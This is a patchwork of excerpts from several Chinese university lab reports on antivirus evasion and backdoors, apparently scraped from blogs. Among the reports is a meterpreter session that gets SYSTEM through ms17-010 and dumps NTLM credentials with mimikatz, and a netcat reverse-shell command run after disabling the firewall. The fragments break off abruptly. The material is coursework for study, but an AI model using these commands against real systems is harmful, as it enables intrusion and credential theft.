meterpreter

目录 一、实验原理 （一）杀软原理 （二）免杀原理 二、基础问题回答 （一）杀软是如何检测出恶意代码的？ （二）免杀是做什么的？ （三）免杀的基本方法有哪些？ 三、实践过程 （一）使用msf编码器生成后门程序及检测 （二）使用veil-evasion生成后门程序及检测 （三）使用加壳工具生成后门程序并检测 （四）使用shellcode生成后门程序并检测 四、思考 开启杀软能绝对防止电脑中恶意代码吗？ 五、实践总结与体会 六、参考资料 一、实验原理 （一） 杀软原理 1、引擎与病毒库的交互作用，通过特征码提取与病毒库中的特征码进行比对识别病毒。 2、启发式Heuristic，通过程序的一些行为和特征来判断。 3、在虚拟机技术上的启发式，通过建立一个虚拟环境运行程序对其进行全方位的检测。 （二）免杀原理 使病毒木马免于被杀毒软件查杀 1、改变特征码 （1）有EXE：加压缩壳、加密壳 （2）有shellcode(如：Meterpreter）：用encode进行编码，基于payload重新编译生成可执行文件 （3）有源代码：用其他语言进行重写再编译（veil-evasion） 2、改变行为 （1）通讯方式 使用反弹式连接 使用隧道技术，隧道协议将其它协议的数据帧或包重新封装然后通过隧道发送，把所有要传送的数据全部封装到合法的报文里进行传送以绕过防火墙。 加密通讯数据 （2）操作模式

2019-2020-2 《网络对抗技术》 Exp3 免杀原理与实践 一 . 知识小结 免杀概念 一般是对恶意软件做处理，让它不被杀毒软件所检测。 基础问题回答 杀软是如何检测出恶意代码的？ 基于特征码的检测 一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。 启发式恶意软件检测 就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确） 基于行为的恶意软件检测 为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确） 免杀是做什么？ 一般是对恶意软件做处理，让它不被杀毒软件所检测 免杀的基本方法有哪些？ 改变特征码 只有EXE— 加壳（压缩壳 加密壳） 有shellcode(像Meterpreter）—利用encode进行编码 有源代码——用其他语言进行重写再编译 改变行为 通讯方式 尽量使用反弹式连接：meterpreter本身即主要使用反弹连接 使用隧道技术：如dns2tcp、iodine可将流量封闭为DNS协议包 加密通讯数据：如使用reverse-https进行转发 操作模式 基于内存操作

kali这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记. mimikatz模块, 能获取对方机器的密码(包括哈希和明文). 渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010 进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样) meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 这获得系统管理员权限 加载mimikatz模块 meterpreter > load mimikatz Loading extension mimikatz...Success. 加载成功. 获取登录密码的hash值 meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;334101 NTLM chenglee-PC chenglee lm{

2019-2020-2 网络对抗技术 20175214 Exp3 免杀原理与实践 一、预备知识 1.恶意代码检测机制 (1)基于特征码的检测 简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。 (2)启发式恶意软件检测 “When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.” 对恶意软件检测来说，就是如果一个软件在干通常是恶意软件干的事，看起来了像个恶意软件，那我们就把它当成一个恶意软件吧。典型的行为如连接恶意网站、开放端口、修改系统文件，典型的“外观”如文件本身签名、结构、厂商等信息等。各个厂商会定义自己的检测模式。 (3)基于行为的恶意软件检测 从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。 2.免杀原理(AV) (1)改变特征码 有EXE 加壳：压缩壳 加密壳 有shellcode(像Meterpreter） 用encode进行编码 基于payload重新编译生成可执行文件 有源代码 用其他语言进行重写再编译（veil-evasion） (2)改变行为 通讯方式 尽量使用反弹式连接 使用隧道技术 加密通讯数据

目录 一、学习目标 二、基础问题回答 三、实验步骤 1、使用msf编码器msfvenom生成后门程序 2、使用Msfvenom生成jar等其他文件 用下面的命令生成php文件 3、Veil-Evasion 4、用shellcode编程生成后门程序 5、加壳 三、实验遇到的问题 1、装veil的时候，缺少Python3.4的包。 2、没有找到hyperion.exe程序。 四、实验感想 一、学习目标 (1)正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分） (2)通过组合应用各种技术实现恶意代码免杀(0.5分) （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。） (3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5） 二、基础问题回答 1、杀软是如何检测出恶意代码的？ 基于特征码的检测：简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。 启发式恶意软件检测：启发式Heuristic，简单来说

0.实验准备 1.实践内容（4分） 1.1 方法（3分） - 正确使用msf编码器 （0.5分）， - msfvenom生成如jar之类的其他文件 （0.5分）， - veil （0.5分）， - 加壳工具 （0.5分）， - 使用C + shellcode编程 （0.5分）， - 使用其他课堂未介绍方法 （0.5分） 1.2 通过组合应用各种技术实现恶意代码免杀 (0.5分) （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。） 1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本 （加分0.5） 2. 基础问题回答 （1）杀软是如何检测出恶意代码的？ （2）免杀是做什么？ （3）免杀的基本方法有哪些？ （4）开启杀软能绝对防止电脑中恶意代码吗？ 3. 实验感想 实验准备 1.免杀 一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础 。 2.免杀技术(Evading AV)综述 就常见恶意软件而言，一般AV的检出率为40%-98%。就算你用了最好的AV，恶意软件依然有1

20175235 《网络对抗技术》实验二 后门原理与实践 20175235泽仁拉措 目录: (1)使用netcat获取主机操作Shell，cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 (5)基础问题回答及实验心得 1.基础知识总结 （1）后门：是不经过正常认证流程而访问系统流程的通道。 （2）常见后门有：编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。 （3）布置后门的流程：<1>有一个后门程序；<2>将其放置在系统里；<3>使后门程序代码运行起来；<3>不被查杀软件查杀且不被防火墙发现。（常用技术有：反弹式连接；加密技术；隧道技术）。 （4）常用后门工具： <1>netcat:又名nc、ncat。是一个底层工具，进行基本的TCP.UDP数据收发，常与其他工具结合使用作为后门。 Linux：自带netcat，输入man nc查看其使用说明。 Windows: 下载ncat.rar工具包。 一、Win获得Linux Shell 先下载ncat到主机，将其解压到d:/ncat

20175133 于沛辰 Exp2 后门原理与实践 0.基础知识 0.1 后门概念 　　后门就是不经过正常认证流程而访问系统的通道。 0.2 哪里有后门？ 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。 　　 狭义定义： 特指潜伏于操作系统中专门做后门的一个程序，“坏人”可以连接这个程序 远程执行各种指令。 概念和木马有重叠 0.3 常用后门工具：netcat 又名nc,ncat 是一个底层工具，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用 1.实验内容 1.1 Win获得Linux Shell 以下实践Windows基本Win7-64bit, Kali 2020-64bit. ·打开Windows监听 在虚拟机win7上调出命令指示符输入指令 ipconfig 查看地址 打开监听，输入指令 ncat.exe -l -p 5133 ·Linux反弹连接win 先输入指令 apt- get install ufw 安装，然后再输入指令 ufw disable 关闭kali防火墙 在kali的终端输入命令 nc 192.168 . 199.136 5133 -e /bin/sh windows下获得一个linux shell，可运行任何指令，如ls ·Linux获得Win Shell

目录 一. 实验内容明及预备知识 1、基础知识 2、实验内容 二. 软件下载及功能测试 任务一：Windows获得Linux Shell 任务二：Linux获得Windows Shell 任务三：使用nc传输数据 三. Meterpreter 四. 实验任务 任务一：使用netcat获取主机操作Shell，cron启动 任务二：使用socat获取主机操作Shell, 任务计划启动 任务三：使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell 任务四：使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容 任务五：可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell 五. 实验中遇到的问题及解决方法 六. 实验总结及体会 一 . 实验内容及预备知识 1、基础知识 （1） 后门 后门概念 在信息安全领域，后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。 常见后门 应用程序的后门 操作系统的后门后门 编译器中的后门 （2）后门工具 Netcatnetcat ，是一个底层工具，又名nc,ncat，进行基本的TCP UDP数据收发。常被与其他工具结合使用，起到后门的作用。 Socat

目录 2019-2020-2 20175303柴轩达 《网络对抗技术》Exp2 后门原理与实践 1.基础知识总结 2.实验内容 任务一 任务二 任务三 任务四 任务五 3.问题与解决 4.基础问题回答 5.实验总结与体会 2019-2020-2 20175303柴轩达 《网络对抗技术》Exp2 后门原理与实践 1.基础知识总结 （1）后门：是不经过正常认证流程而访问系统流程的通道。 （2）常见后门有：编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。 （3）布置后门的流程：<1>有一个后门程序；<2>将其放置在系统里；<3>使后门程序代码运行起来；<3>不被查杀软件查杀且不被防火墙发现。（常用技术有：反弹式连接；加密技术；隧道技术）。 （4）常用后门工具： netcat:又名nc、ncat。是一个底层工具，进行基本的TCP.UDP数据收发，常与其他工具结合使用作为后门。 Linux：自带netcat，输入 man nc 查看其使用说明。 Windows: 下载ncat.rar工具包到桌面。 meterpreter:是一个后门平台。其中有大量零件可调参数，用时组合可以生成可执行文件。 （5）后门启动： 任务计划程序——>新建任务计划——>触发器——>操作程序或脚本——>操作添加参数。 2.实验内容 任务一 (1)Linux获得Win Shell 输入